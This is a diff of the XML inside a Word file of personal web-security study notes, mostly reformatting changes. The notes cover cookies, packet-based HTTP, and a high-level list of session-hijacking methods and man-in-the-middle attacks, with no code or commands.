+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t xml:space="preserve"> so they will try to steal those ids or trick users to use ids they have control over.</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>Anyway an attacker can gain control of user’s session without their knowledge.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Anyway</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> an attacker can gain control of user’s session without their knowledge.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>Browsers keep track of session keys used to identify users.</w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>Communication in internet is done using packets.</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>3 ways to steal session key</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">3 ways to steal session </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>key</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>1)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t xml:space="preserve">Guessing key </w:t>
@@ -930,53 +2767,184 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>2)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>Tricking user to login with compromised key</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
         <w:t>3)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>Stealing key from client or server</w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>Man in the middle attack</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Man in the middle </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>attack</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
@@ -1512,6 +3480,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">

--- a/infosec_notes_blockwise/blocks/block_20_web_security_notes.docx
+++ b/infosec_notes_blockwise/blocks/block_20_web_security_notes.docx
@@ -628,6 +628,45 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Cookies used for more than session management.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Cookies used for keeping track of what users do and what users like.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
@@ -738,6 +777,7 @@
           <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>3)Domain states domain for which cookie is intended. Consists of last n fields of domain name of server.</w:t>
       </w:r>
       <w:r>
@@ -807,7 +847,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>When web server requests cookie ,it provides a domain. Cookies that match     domain maybe sent to server.</w:t>
+        <w:t xml:space="preserve">When web server requests cookie ,it provides a domain. Cookies that match     domain </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>maybe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sent to server.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -850,7 +908,6 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="pt-BR"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -866,7 +923,6 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="pt-BR"/>
         </w:rPr>
         <w:t>(HTTPS)</w:t>
       </w:r>
@@ -936,7 +992,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>(ilearn video)</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ilearn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> video)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1142,6 +1216,7 @@
           <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>That’s like sending letters, they are data packets ,see them as packages that postman carries.</w:t>
       </w:r>
     </w:p>
@@ -1188,344 +1263,364 @@
           <w:szCs w:val="28"/>
           <w:highlight w:val="green"/>
         </w:rPr>
+        <w:t>HTTP -protocol with web is a pac</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="green"/>
+        </w:rPr>
+        <w:t>ket</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="green"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> based protocol.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="green"/>
+        </w:rPr>
+        <w:t>Feels like a connection, when I connect to bank do stuff and then drop connection.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> But not.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>On a underlying level HTTP is me sending packets and getting something in return.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>When we make communication into sessions, we are working hard to make packages look like sessions.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>That’s when we get idea of cookies and their use for making things like sessions,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Appear out of quickly running postman.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Little illustrations here</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Me sitting at desk ,wanting to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>communicate with bank.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>Doing this over the web .</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>Some kind of communication going on.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Since </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>its</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> via the web,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> it is packet based at a low level</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> , even though I can imagine it’s a connection.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Problem comes if connection between me and my bank is not as strong as it should be.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>What can happen in that case is that somebody else can come along and usurp the connection and take over here and continue communicating with the bank.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>We do have a problem with packet based communication</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> , is this communication between the 2 parties might be weak enough for somebody to break the connection, jump in and  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>assume (usurp)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>HTTP -protocol with web is a pac</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:highlight w:val="green"/>
-        </w:rPr>
-        <w:t>ket</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:highlight w:val="green"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> based protocol.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:highlight w:val="green"/>
-        </w:rPr>
-        <w:t>Feels like a connection, when I connect to bank do stuff and then drop connection.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> But not.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>On a underlying level HTTP is me sending packets and getting something in return.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>When we make communication into sessions, we are working hard to make packages look like sessions.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>That’s when we get idea of cookies and their use for making things like sessions,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Appear out of quickly running postman.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Little illustrations here</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Me sitting at desk ,wanting to </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
